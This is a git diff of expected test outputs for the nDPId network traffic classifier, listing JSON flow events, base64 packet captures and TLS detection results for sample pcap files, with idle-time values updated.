-00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mEAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAAhAD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="} -00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"8eae3e18d36ce24c4ac6b9eeb84ac762","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51591,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mHAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAAAAD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="} -00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51591,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51589,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51590,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51591,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mDAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAASAD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="} +00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51587,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.google.it","ja3":"755cdaa3496eb8728247a639dee17aad","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51590,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mGAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAAhgD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="} +00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51590,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51589,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mFAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAAhQD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="} +00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51589,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mEAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAAhAD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="} +00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"8eae3e18d36ce24c4ac6b9eeb84ac762","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51591,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mHAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAAAAD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="} +00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51591,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51589,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51590,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51591,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","packets-captured":5,"packets-processed":5,"total-skipped-flows":0,"total-l4-data-len":895,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":5,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1391444859282} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 5/5 diff --git a/test/results/tls_esni_sni_both.pcap.out b/test/results/tls_esni_sni_both.pcap.out index b704714a9..34c2be846 100644 --- a/test/results/tls_esni_sni_both.pcap.out +++ b/test/results/tls_esni_sni_both.pcap.out @@ -1,19 +1,19 @@ 00468{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1595697574192} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1595697574192,"flow_last_seen":1595697574192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1595697574192,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1595697574192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1595697574192,"pkt":"LLBdqyO5+P\/CRWqLCABFAABAAABAAEAGYZTAqAEVaBGvVdjMAbsVnUj1AAAAALAC\/\/+ITAAAAgQFtAEDAwYBAQgKRX5W8wAAAAAEAgAA"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1595697574222,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1595697574222,"pkt":"+P\/CRWqLLLBdqyO5CABFAAA0AABAADkGaKBoEa9VwKgBFQG72MxjNlEZFZ1I9oAS\/\/+oqwAAAgQFeAEBBAIBAwMK"} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1595697574222,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1595697574222,"pkt":"LLBdqyO5+P\/CRWqLCABFAAAoAABAAEAGYazAqAEVaBGvVdjMAbsVnUj2YzZRGlAQEADZRAAA"} -01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1595697574192,"flow_last_seen":1595697574223,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":634,"flow_tot_l4_payload_len":634,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1595697574223,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"these-are-not-the-droids-youre-looking-for.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3"}} 